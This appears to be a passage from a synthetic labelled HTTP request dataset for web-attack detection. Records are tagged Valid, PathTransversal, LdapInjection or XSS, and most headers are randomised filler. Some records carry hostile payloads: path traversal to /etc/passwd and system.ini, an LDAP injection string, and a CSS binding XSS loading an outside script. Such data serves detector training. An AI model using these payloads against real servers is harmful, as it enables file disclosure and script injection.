If-Modified-Since: Fri, 21 Oct 05 02:31:43 CET
If-Unmodified-Since: Mon, 25 Oct 04 06:00:42 UTC
If-Match: "1PKjliFUbeDC_p5py5c"
If-None-Match: *
If-Range: Thu, 08 Sep 05 12:13:08 UTC
Max-Forwards: 53
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM b1BhTG9venJuT0F5dGtlaWVpc251YXZudGNhUmtldG9qQXM=
Authorization: NTLM bGltYXgwZW9laTBoc3NybVRoYWVzZHNhc3NsdDhvZEhlYWt0ZmRkaXRkZXhk
Range: -972278
Referer: http://me1hSqp.it/17ecA/RdeCI/okupdlai/reiA.js
TE: trailers
Trailer: Accept
User-Agent: e8Apwg http://www.loasvosc.be
UA-CPU: Sparc
UA-Disp: 7612,740,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: HTTP/4.7 www.eahoiNd.tiff
Transfer-Encoding: gzip
Upgrade: tOgk/7.2, 57lv/3.4, zpxc/7.9
Warning: 367 181.6.7.177:7 "oiegnotboa" 
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 941903
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44974
Start - Id: 45475
class: PathTransversal
GET /esj7U/k2AsG/bR.nsf?Pw.n6w=i%3A%5Cautoexec.bat&o6rsmw6lep=98105180&hoU6tanoaoa=lG7&eroNop=209&hW2wstlUpnsa3ea=g8UlivARqL9&ueN3IxdvcihrotR=rre&eeaenhd0jeflu2=l8lip8snndrol&uvycof=739&io=oJVy&EeoLuilwad2oozi=81&eam=49Bhb1kQn&DGRXCdivxusrol=s+%3CaEearRal%27&7mBe4he=io%2FtiframeehteLtXs1sEuxf&eL=78434184&7is=4533723 HTTP/1.0
Host: www.eoaIon.ch:3
Connection: keep-alive
Accept: video/*, image/png
Accept-Charset: x-mac-chinesetrad;q=0.8, big5;q=0.4, windows-1253;q=0.6, x-mac-turkish;q=0.4
Accept-Encoding: 
Accept-Language: hAsr-sfdii, fg-vtmksr;q=0.8, os-kSg7lae, lfzpnH-0aaxx, oa-iyhget
Cache-Control: no-transform
Client-ip: 172.157.36.227
Cookie: xnetFoshh=ep;nnsQfakiNw=1EFa5RLa;yuob=access_logeH4r
Cookie2: $Version="01"
Date: Wed, 12 Jul 06 24:48:07 CET
ETag: "SNte7ILi2nb3CVfm3U2f"
Expect: 100-continue
From: 9lho@aiRe.net
If-Modified-Since: Sun, 31 Dec 06 20:05:24 GMT
If-Unmodified-Since: Sat, 18 Oct 08 06:54:53 GMT
If-Match: "IF0MoCAR@dw@D2VDn92"
If-None-Match: "f1FQh7EwzZnLTMGpX8"
If-Range: Wed, 03 Aug 05 07:48:56 UTC
Max-Forwards: 688
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest username="hesa"
Authorization: Digest uri=http://www.toaM.com/8seoind/stty/aewnmO.conf
Range: 934-,6-,-7
Referer: http://www.1u8yin.cz/emal/aesp/hdzjDhH.exe
TE: gzip;q=0.1
Trailer: Referer
User-Agent: Mozilla/9.3 (compatible; MSIE 3.6; Open BSD i586; aohD; eulsT; 8sygt)
UA-CPU: x86
UA-Disp: 1452,073,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5163x468
Via: FTP/2.9 223.210.147.184, FTP/5.7 www.dgESoui.png, 7.6 www.bo3t0es.jpg
Transfer-Encoding: identity
Upgrade: drf/1.3, eoe/9.9
Warning: 126 www.bm57.shtml "tust8ovdsrl" "Tue, 15 Jan 08 10:20:10 CET"
X-Forwarded-For: 150.175.159.37
X-Serial-Number: 49844
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45475
Start - Id: 37484
class: LdapInjection
GET /uf76MRUdRvv4f_.a/JmmDrKGWZ-J3astdinD.mdb?h5ebaeeeiiTera=utsbHEiEOE&iOERs2v=a0eeteo0eEakUoi&yn8b=0&ri=n8OO8&ah=tmpAo&thtza=7152736&cm=+&vmi8iyboToo=uc9e&nlln2=ahsmnKa0uehneut4h HTTP/1.1
Host: www.eo6oimLs.it
Connection: close
Accept: */*;q=0.2
Accept-Charset: windows-1252, x-mac-japanese, iso-8859-6;q=0.4
Accept-Encoding: deflate;q=0.3
Accept-Language: etou-nxec;q=0.6, neeosto-0ceaiosd
Cache-Control: max-age=6
Client-ip: 9.91.28.148
Cookie: 7hddnoecnre4Eee=020884;f4yrmklyto=)    (  |    (bc=ohe9*);tcdta=a7idrop;rElntnEpsunu=2932038;gaeif=97;nt2SljlhnhTcm=Zscc6dn
Cookie2: $Version="597"
Date: Sat, 06 Jan 07 19:52:15 UTC
ETag: "cPQ6HDW6xaI-L5sjNr6"
Expect: ciaekCp=vE8n;Nfdecado=setli
From: tafrogow@0trsb.de
If-Modified-Since: Sat, 15 Sep 07 20:41:38 CET
If-Unmodified-Since: Fri, 21 Dec 07 16:48:58 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5439
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.nRrndret.com/rsidruI/hph7shpn/1ttdtr07/2rMu/ylhd0.tiff
Authorization: FEei 0cauE=ju5dnkki
Referer: http://jsu8HtDL.gov/k3a0inp/8lodkEam.asmx
Trailer: Warning
User-Agent: Iiae/4.4
UA-OS: Linux
Via: FTP/6.3 www.yuns.shtml, FTP/2.6 176.218.13.159, nfbEae/2.2 227.39.225.192
Transfer-Encoding: gzip
Warning: 467 100.224.144.169 "tnaiAtneptehnz6ndIrt" "Sun, 07 Dec 08 02:23:15 CET"
X-Forwarded-For: 139.237.65.5
X-Serial-Number: 67966182
----: -----------------------

null

End - Id: 37484
Start - Id: 2265
class: Valid
GET /TwZ/tdalopeolhbroopeef.png?evt=e4otrlstylelmlu5ur0documentse&btuo2x=mgiR0t&ranwcosm=uEtfosoe8&sxeK8ue=0222&ZrVD=n&aiwdenM7slhda=8232168 HTTP/1.1
Host: 234.54.19.28
Connection: tasa
Accept: video/*;q=0.7
Accept-Charset: koi8;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 226.42.221.157
Cookie: mrhe=lIot;iogdot=urejmgn5tb\d;yh9tnoenbtktt=9217811;eujnw=s
Cookie2: $Version="2"
Date: Sun, 27 Apr 08 07:19:15 GMT
ETag: "czBkLOu.NNn9-8RH"
Expect: 100-continue
From: oniNcb@l92ecsed.it
If-Modified-Since: Tue, 20 Jan 04 02:30:24 UTC
If-Unmodified-Since: Fri, 25 May 07 13:24:02 CET
If-Match: "UJP42q5oxNUkEPbl0yC"
If-None-Match: "01o3JVyYovN@Daeu"
If-Range: *
Max-Forwards: 4444
MIME-Version: 1.3
Pragma: aan='hi'
Proxy-Authorization: Digest username="hheA"
Authorization: NTLM aXhlcjJhTGVlZ2VvbmVpcWtuYWJnOXJvb2VvZXRvYXRBZQ==
Range: -458438,6075-5448
Referer: http://www.rdil.cz/fe8iygde/izIoAr.fgf
TE: chunked,trailers,trailers
Trailer: Pragma
User-Agent: eboiaas1
UA-CPU: StrongARM
UA-Disp: 006,895,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 910x667
Via: 6.8 www.1th7ttgy.css, sos/1.8 13.40.145.242
Transfer-Encoding: identity
Upgrade: Xnpee/1.8
Warning: 268 www.aimeH.png "tcinawttnIeteq" 
X-Forwarded-For: 211.5.1.135
X-Serial-Number: 61486796053346804
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2265
Start - Id: 26459
class: Valid
GET /dVlvScsr_wVPof/auhneolanereocmts.gif? HTTP/1.1
Host: 158.36.56.175
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese, windows-1257;q=0.9, x-mac-japanese;q=0.3, macintosh;q=0.5, x-mac-arabic;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: Tohhp='n'
Client-ip: 243.242.93.110
Cookie: meaner1jha=93267257;IiVIsca3mngc0eu=ow6ocnbeeiae;aauotigij=aodn
Cookie2: $Version="6"
Date: Sat, 06 Jun 09 15:34:14 GMT
ETag: W/"aH2jp.pfySLbmKqBQ"
Expect: tipoj=egai
From: nthers@Iodoaa9t.it
If-Modified-Since: Sun, 05 Jun 05 10:36:40 GMT
If-Unmodified-Since: Sat, 05 Nov 05 12:10:11 UTC
If-Match: *
If-None-Match: *
If-Range: "zvbtGWGZjTGL_WP5"
Max-Forwards: 400
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest username="tmff8btS"
Authorization: Basic b0xhb2N4czpiY2UzcA==
Range: 31-37154,2-
Referer: /ekogw.asmx
TE: trailers,gzip;q=0.6
Trailer: From
User-Agent: Mozilla/4.8 (X11; U; Open BSD i386 2.9; ya-rj; rv:5.0.5) Gecko/17723194
UA-CPU: StrongARM
UA-Disp: 719,2731,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 326x7197
Via: sOi/8.4 195.231.110.54, 2.8 49.89.56.192, 5.1 189.84.34.175
Transfer-Encoding: if6hi
Upgrade: Eevtr/5.1, sybrvn/0.7
Warning: 220 www.o3thefd.html "7cronrpc" "Thu, 19 Apr 07 17:54:26 UTC"
X-Forwarded-For: 135.109.117.133
X-Serial-Number: 101021310
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26459
Start - Id: 12040
class: Valid
GET /sOIjKm6SfOcTuE_pzG.htm?0LyexecT1VtL0.=1293263&enedionTmce=9&aooelo2=ih&eih1hrentEcti=81868906&eBzcasem=26527&-pXj=odV%40 HTTP/1.1
Host: www.ecjn7stn.biz:9281
Connection: er8rvenc
Accept: video/quicktime;q=0.1, image/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: caieia-s7;q=0.2
Cache-Control: min-fresh=78823
Client-ip: 228.68.186.157
Cookie: 3e=5401863;safttbsrnco=u'otsrpD;nhmqohZ=z3ncopt
Cookie2: $Version="3"
Date: Wed, 03 Sep 08 03:03:09 GMT
ETag: "G5Dde7x68fLkAc32q.cA"
Expect: 100-continue
From: bteasrrn@to2anee.fr
If-Modified-Since: Mon, 30 Jan 06 22:31:53 GMT
If-Unmodified-Since: Wed, 26 Sep 07 14:42:41 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Nov 04 17:08:51 CET
Max-Forwards: 96
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Digest nc=117fd3f5
Authorization: hajt et08ea=oeev
Range: 421490-
Referer: http://Ebieee.de/7gwci/teniTaq/mnSa/hAso2reo/yaAd.cgi
TE: gzip;q=0.4,trailers
Trailer: Warning
User-Agent: arhncr (dZteckt; shTtP0buC)
UA-CPU: MIPS
UA-Disp: 123,4822,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 165x736
Via: 7.9 www.Tslqa3sq.jpeg, 4.3 97.206.83.175, 8.1 202.247.250.58
Transfer-Encoding: identity
Upgrade: hrhef/3.6, dhe/2.9, s8nhre/8.0, dorop/7.3, o9g/4.9
Warning: 612 www.s27m.htm "eouphmjfeh7gCrcyr" 
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 0508881327530
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12040
Start - Id: 36063
class: PathTransversal
GET /twaP26r0t/tTgPpnYY/cg@ipsYrmMQbU/c0mpCttiworarHTmMw/nqnn0EAie0esmebtR/aa_hgKttHM8Bfs/dentadOtidnaarLDSsN/4ErdtQVZgcQC/myie.js?8to=ti4e&eflzohois=78&Q_BNrFO=p&Hynwaicax=e+s&0man=1dwereZ&R_-e_KWQobjectBWO=97592&se=tl-divevIeeevle8r&rhRqeayn1aiso=a5yb&ihytidot0ne=cs+ety%24w&ctebs=ti&Wh7r222cap=39651088&ttruev0Eeedy=..........................WINNTsystem.ini HTTP/1.0
Host: www.eletto.fr
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.0
Accept-Language: lssact-ht4ibeZ;q=0.8, iei-3atmqrce;q=0.9, w7-tlt87ul;q=0.2, mmraiT-9
Cache-Control: max-age=5
Client-ip: 75.78.7.59
Cookie: cjgse=9hUXufyADw;8Re57=tIpeetjtstnh;oeeoo=to s
Cookie2: $Version="8"
Date: Tue, 01 Jun 04 21:30:44 CET
ETag: "nwiJcHK5AiUwYPQsUKR"
Expect: rthr
From: Esva@5c4oorIai.it
If-Modified-Since: Fri, 25 Feb 05 23:34:02 CET
If-Unmodified-Since: Mon, 13 Oct 08 23:45:49 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 19 Aug 09 13:31:24 UTC
Max-Forwards: 0489
MIME-Version: 1.3
Pragma: De=5idT
Proxy-Authorization: NTLM dW50b2ppZWE3em1vdEFuYWFVRW1jcmVjaGhkZWFzbmhpaWh0SXc=
Authorization: rart iRek=zCrhan
Range: -31,-3,49859-
Referer: http://paEb2eoa.org/gtoMns/rS2Tfnpo/wreaeew/pohai.conf
TE: deflate
Trailer: Warning
User-Agent: Mozilla/0.6 (Windows; U; Windows NT 3.0; oa-fu; rv:6.6.3) Gecko/07218439
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 745x4826
Via: FTP/6.8 103.130.154.78, 6.0 www.xan3n.gif, 3.1 www.1moleexq.css:441
Transfer-Encoding: gzip
Upgrade: sztad/3.9, y9oto/3.0
Warning: 312 152.156.79.110 "mvw6naexs" "Mon, 19 Sep 05 14:03:29 GMT"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36063
Start - Id: 46234
class: PathTransversal
GET /pI8um.jpg?ehjkecpsyHte=3&5jrmrtibefhb=aunion3&et4mLE4c6ja=2386586&2ioanc=32tntmn&PBrsh5pdd1=800260&Eztfirfa6e2yaai=408&e6nsT=%2Fetc%2Fpasswd&uiimttbnmym=aareEemhdeh&oO0ry8u2=449&NnP98erbishtehd=rnmhiN HTTP/1.1
Host: www.tihR.net
Connection: close
Accept: */*
Accept-Charset: euc-cn;q=0.6, x-mac-chinesesimp;q=0.7, iso-8859-8
Accept-Encoding: identity, gzip
Accept-Language: f0neh-as;q=0.0
Cache-Control: only-if-cached
Client-ip: 239.42.171.202
Cookie: hta=792;9pr8ctgds3eh=sWu&m(;nx=qSev >klc
Cookie2: $Version="8"
Date: Wed, 25 Jan 06 21:38:07 GMT
ETag: W/"ST3jGS5xrQZ2inWOP6F"
Expect: 100-continue
From: eftra@neleobejy.com
If-Modified-Since: Sat, 30 Dec 06 15:58:01 CET
If-Unmodified-Since: Tue, 02 Nov 04 09:51:03 CET
If-Match: *
If-None-Match: *
If-Range: "obeLxAKivl4.Yg2Y"
Max-Forwards: 9
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: sczoan Qaahstc=tldthrl
Authorization: NTLM aWlvNG5lYXJzMmlvZGl0bmNsdXRhbWFIdTFpYWlwYW1vZWJlYWRuMG5kczg=
Range: 173-
Referer: /y7cAaih/Bvreset.gif
TE: trailers,chunked
Trailer: Accept-Encoding
User-Agent: 3UFUhFZcw http://www.TlmeEe.com
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7340x8822
Via: 5.4 www.pncnuio7.css, HTTP/2.0 www.t9iihm.html
Transfer-Encoding: o5tst; thmi0=tvxnoz
Upgrade: Sdb/4.1
Warning: 184 206.216.134.51 "HoiohIsEnswdritsd" "Wed, 21 Jan 09 03:58:33 GMT"
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46234
Start - Id: 46663
class: XSS
GET /i./ntiRo/ocerdHcopyW/9PMQYlvtORnT.cfm? HTTP/1.1
Host: 39.120.105.164
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: hagp8h-9;q=0.2, oran-n;q=0.1
Cache-Control: min-fresh=424
Client-ip: 88.188.34.246
Cookie: eono=<div     style    =  "binding:     url([http://www.to.com/script/tx.aspx]);   " >
Cookie2: $Version="94"
Date: Fri, 01 Jul 05 17:39:21 UTC
ETag: "5zQ01NH@dpA_r7g8e"
Expect: niet0idA=tgesrYs
From: os7ddt@2hedt3.cz
If-Modified-Since: Fri, 24 Nov 06 06:29:48 UTC
If-Unmodified-Since: Sun, 26 Aug 07 13:52:45 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 45
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest nc=BdfD5Ba4
Authorization: Basic aGFkczEybjpsNnVlYQ==
Range: -345631
Referer: http://estzisp.ch/7ekwaet/rynswh/iUh1efi/sroog.mpeg
TE: chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: oads7iqfTgdror
UA-CPU: PowerPC
UA-OS: WinNT
UA-Color: color16
Via: ysj/5.7 79.31.52.228, nst/7.2 113.2.89.28, FTP/5.7 182.235.18.242:59392
Transfer-Encoding: deflate
Upgrade: 0hi/0.1, sdpair/3.6
Warning: 212 www.ee2Ee.js "iuaewa4tc" 
X-Forwarded-For: 216.174.136.108
X-Serial-Number: 64753281
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46663
Start - Id: 5972
class: Valid
POST /betweenlJROidautoexec/Ih0Oe4thb7tcqrDaa0/acdck@.Gd/wiaomepporETmosyak/gTfaEaKActhn/soVu/dVvbSLE7VTSuuEscsg/ljy8O6JR.aHscfVyG.@/oZIO8d.t@QvQ0m/vrecacr57nhdetmu/tFrujQdgvil/we.js? HTTP/1.0
Content-Length: 190
Content-Language: dz6hio,riiceor,eo
Content-Encoding: deflate
Content-Location: /elhWa/nudr/2enloshp.doc
Content-MD5: bmNtazdoaTJINGVsbkhtYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Feb 05 03:01:03 GMT
Last-Modified: Fri, 24 Nov 06 08:29:55 UTC
Host: www.ieis.de:4910
Connection: keep-alive
Accept: video/*;q=0.8, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: mtv-e9wokn;q=0.8, vslek-nr;q=0.0, p8dExdso-3d
Cache-Control: no-store
Client-ip: 129.229.18.134
Cookie: 4t8h=nWhlzlemepen;tqec=tHhoH4;iKJm=14C;6nuchfaRC1kv=atlyt;Jtr=ws;NA=fuQLJt.
Cookie2: $Version="0"
Date: Fri, 23 Jul 04 01:54:12 CET
ETag: W/"cU7PSuHBpRlrODCr"
Expect: 100-continue
From: u2oof@gs2elrr.biz
If-Modified-Since: Mon, 21 Aug 06 08:41:44 UTC
If-Unmodified-Since: Fri, 25 Sep 09 09:53:45 UTC
If-Match: *
If-None-Match: "E@ukxZMz2LXZv3kU"
If-Range: Thu, 21 Jun 07 13:47:15 CET
Max-Forwards: 57
MIME-Version: 7.2
Pragma: 4i=n3f
Proxy-Authorization: NTLM bkNuaXNvbGExYW1hdGlodHRzZUh3NG5jYmtvNWloT3RuYW0ydnNv
Authorization: Basic Tmxzcm55OmVtaHJ0
Range: 7772-71595
Referer: http://www.ot1tnol1.net/oeksuM.swf
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/9.8 (compatible; MSIE 2.7; Open BSD i586; tatsylks; hutrtwt8t; cexm)
UA-CPU: PowerPC
UA-Disp: 834,6780,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 008x6801
Via: 5.7 www.hjTpb7gs.css, HTTP/9.6 www.xoeg5agt.html
Transfer-Encoding: compress
Upgrade: treana/1.3, oher5/3.1
Warning: 116 www.AsB4fE.css "ceGyewiRcegeii" "Mon, 10 Aug 09 03:15:41 CET"
X-Forwarded-For: 232.218.22.35
X-Serial-Number: 490268
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

ynasotoNe3tea=tisqtit3H&ra2o=iiienvsnbd4n&wX5h=99006&es=ett+>likeneEet m%0enWut&AwTrmq=7985198548&jIWL=9&chambdhVon4Lsel=Rcl&8whaanMnoa=nnst&ie7intel5=eab&qXgQkJg00Iexec=owinnt&aReA=ss

End - Id: 5972
Start - Id: 4845
class: Valid
PUT /0httpsw-.htm? HTTP/1.0
Content-Length: 31
Content-Language: 4ankm,rhen
Content-Encoding: gzip
Content-Location: http://www.etyh.org/impIreRh.avi
Content-MD5: YW5sdGRvb21oZXRtcnNiTg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Mar 10 07:43:59 CET
Last-Modified: Wed, 10 Jun 09 16:44:25 GMT
Host: 142.114.140.76
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-2022-kr;q=0.8, x-mac-greek
Accept-Encoding: compress;q=0.7, identity, deflate;q=0.1, gzip;q=0.3, gzip
Accept-Language: us-ibma5, 4TTneg-cenx, niimoio-de, eyrt-ex, e-aacinta
Cache-Control: no-cache
Client-ip: 173.63.67.215
Cookie: ndsnnkApansSym=enepcsElli;yrwksneiRec=62;i9oeqdC=72989047
Cookie2: $Version="639"
Date: Sun, 31 Aug 08 07:09:13 UTC
ETag: "lUqoSzzB.@-hL@tfIz"
Expect: 100-continue
From: nhsan@2Rabgt7e.net
If-Modified-Since: Mon, 29 Nov 04 22:38:32 GMT
If-Unmodified-Since: Sun, 02 Jan 05 10:12:08 CET
If-Match: *
If-None-Match: *
If-Range: "Z-7o_twU9O-0TexL.nax"
Max-Forwards: 68
MIME-Version: 8.6
Pragma: n=rh
Proxy-Authorization: naIcSN re1rfCoS=bpehrr
Authorization: Basic bTJyZ2hubzphY2lsNg==
Range: -2648,-1383,481-169
Referer: http://www.neMul.be/nLeo4.dll
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/1.1 (Machintosh; U; Mac OS X 1.3; pa-1B; rv:8.4.6) Gecko/82372205
UA-CPU: Sparc
UA-Disp: 092,446,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 812x666
Via: 9.8 www.elqoia.jpg:7
Transfer-Encoding: identity
Upgrade: blg/4.2
Warning: 714 www.gNbN.shtml:866 "rlagij2neSygelcdhn9a" "Tue, 10 Mar 09 19:39:56 UTC"
X-Forwarded-For: 191.124.85.186
X-Serial-Number: 688276935690
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6atvar2t7ontyT=Oitametayse$ih

End - Id: 4845
Start - Id: 27290
class: Valid
GET /inu69ntPp7hheo/dfNYFnX0/hhliqttsr4d0rcmoi/CiumFO/ahLn3seihadnr6spirt/1fuQ6bgvTy.css?titde7s5e=oAlbbIrseftwiueadE&vNo=ajY6mTrl5&Wk8xml3_allxWEt=40057&nEoteviksnor0nl=91826347&lgDeyToeicaao=xL5yxPdAR&nusn=j4LlO6OTF&etie=txtn4 HTTP/1.0
Host: 64.83.92.252
Connection: at97da
Accept: audio/*, video/*;q=0.6
Accept-Charset: x-mac-chinesetrad;q=0.2
Accept-Encoding: identity, gzip;q=0.1, gzip, identity
Accept-Language: pneoa-rrtG1yaa;q=0.2
Cache-Control: no-cache
Client-ip: 4.237.23.124
Cookie: ttoz=5lyttueeqLleauebf;m2eesdnaItE=sdu8hdefhzsTlhu;thr=070163;53oeid7tlA=y|(varnt;emereuhs=dd3;hpdniOctsefs5e=2
Cookie2: $Version="26"
Date: Wed, 25 Nov 09 07:42:30 UTC
ETag: W/"dZdeLIIail_Zlt0UZ"
Expect: 100-continue
From: Dt21hm@sbe22sjbhs.com
If-Modified-Since: Sat, 08 Sep 07 05:03:31 UTC
If-Unmodified-Since: Sun, 04 Nov 07 06:07:13 GMT
If-Match: "o..zbaSPInGvSN7Mc1"
If-None-Match: *
If-Range: Wed, 30 Jul 08 19:47:39 CET
Max-Forwards: 6890
MIME-Version: 6.6
Pragma: Nxrt7h1='9eynrtc'
Proxy-Authorization: NTLM cGxzckZBc2JjYXVDYTljMXNldXJhaXU1cnl0aGluYmVzY1J0ZHNwc24=
Authorization: Digest username="4arjfzEs"
Range: 589-
Referer: /0zaayo/sinsonrO/ixtoime/uwclyR.ace
TE: trailers,gzip;q=0.3,deflate
Trailer: Via
User-Agent: i3yeeoarlanw4l0
UA-CPU: PowerPC
UA-Disp: 3109,349,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6912x6352
Via: 9.5 57.13.234.143, 2.4 www.iat2o.gif:9435, HTTP/9.4 www.liea.jpg
Transfer-Encoding: gzip
Upgrade: r3yltn/4.8
Warning: 273 www.heOakte6.shtml "addsln" 
X-Forwarded-For: 202.99.49.239
X-Serial-Number: 75164077038098175
----: -----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27290
Start - Id: 23104
class: Valid
GET /ereidfzs/reShg4x1mudesicure5e/diueeiDsevsso/tCzb.Vp3x9S.php?egicmS0auteunHi=966&4zZuusrNnPCRl_=uae7perciEt1z&5a=lefectgiA&ssw2yhf5af5=75972&bidelible0uMa6=01&iyituehdei2te=3411&ii3qab=Aeorryeit+5or%7Er HTTP/1.0
Host: www.htlin.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, deflate
Accept-Language: *;q=0.0
Cache-Control: max-age=7755
Client-ip: 164.78.31.224
Cookie: LOA.C=eHwCmaH-kn;aJhG4B=nn;nhiaehrba5ys=osi(n
Cookie2: $Version="505"
Date: Sat, 29 Jul 06 07:15:44 CET
ETag: W/"t15mmUNACPbF9yvF1h8d"
Expect: 100-continue
From: Hocan@osthutarg1.biz
If-Modified-Since: Thu, 16 Jun 05 03:11:57 CET
If-Unmodified-Since: Thu, 20 Jan 05 21:49:59 CET
If-Match: "jXVHc71lDooxOPY0GsKH"
If-None-Match: *
If-Range: "ErcxaJ@@FrS@lptYdNg"
Max-Forwards: 2590
MIME-Version: 8.3
Pragma: d='euomtcf5'
Proxy-Authorization: Digest nonce
Authorization: Basic bzl0MWZydXQ6amFzZXAy
Range: 189-,863-
Referer: /efcuinf/gasp.cfm
TE: deflate;q=0.3
Trailer: Accept
User-Agent: te5Dldeucrvlmrny6b
UA-CPU: Sparc
UA-Disp: 519,575,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0764x660
Via: 8.0 157.56.135.198
Transfer-Encoding: compress
Upgrade: raife3/4.4, tde/7.8, hre/2.4, wcct/1.7
Warning: 770 123.137.130.236 "6enewerc5oeejdr" "Tue, 23 Aug 05 16:07:21 CET"
X-Forwarded-For: 73.70.52.35
X-Serial-Number: 18684889581671575
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23104
Start - Id: 15883
class: Valid
GET /nEniw.js?sossTbnShr=%25&T5nivesbbvdThn3=deslieFohGstc&smetHi0gclU=u%400AR&Atcf6nnDk=voogRn&pcud=are+&tuuaoehacn=7118939&kq26mmety=ddheojas&hqayee2=ishutdownaT2sidpo+69lfh+&re0AoOnl9e=latq9CR7o&EAsoolatjsnr=+ybodyoetl+m&ha0orcs=guoOh HTTP/1.0
Host: www.enMmu.org
Connection: 6Emmtjn
Accept: */*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.2, compress;q=0.4, gzip, identity;q=0.7
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 197.55.8.188
Cookie: laueryeni=imgncwnlahttpsm&;ir5e2aasmrjaOz=ss4e;i719t=teval2imjlhr%gzn8d;elaste=ee;rrota=7861
Cookie2: $Version="34"
Date: Sat, 12 Jul 08 13:10:36 GMT
ETag: W/"zNM1sZ70pkYR7sUn"
Expect: tUOnsd=jes6ndZs;Iihhnrle
From: ks2tnwg@hnreg9rhrn.biz
If-Modified-Since: Fri, 26 Jun 09 23:44:18 UTC
If-Unmodified-Since: Fri, 20 Jun 08 12:51:27 UTC
If-Match: *
If-None-Match: "qmgo6DJL9ZbDJnIYdX"
If-Range: Sat, 24 Sep 05 21:11:12 GMT
Max-Forwards: 477
MIME-Version: 8.0
Pragma: nzx2=fra3xa
Proxy-Authorization: NTLM WmxpZDRlZU1kT3NlcW9jd2R0YWFsbU5vZXVjME9oc2lvOW9hd2NlaQ==
Authorization: gcrsFa egfr=wbdea3Re
Range: 141-7620
Referer: http://www.erp8d.net/BOmt/gi0s81r/Ch3ar/TtiA/uaherwso.exe
TE: trailers,deflate;q=0.2
Trailer: Host
User-Agent: Mozilla/2.3 (Machintosh; U; PPC Mac OS X 4.5; gn-oa; rv:1.2.9) Gecko/53080913
UA-CPU: MIPS
UA-Disp: 318,100,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 664x941
Via: HTTP/4.2 179.94.157.232, FTP/6.4 www.higsmwth.jpg:2
Transfer-Encoding: identity
Upgrade: 5hn4s/0.4, tec/5.7, ry4ia/5.2, 6ik/3.4
Warning: 350 131.15.21.242 "Sel0th" "Sun, 27 Jul 08 18:49:35 CET"
X-Forwarded-For: 188.189.177.85
X-Serial-Number: 828350
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 15883
Start - Id: 21753
class: Valid
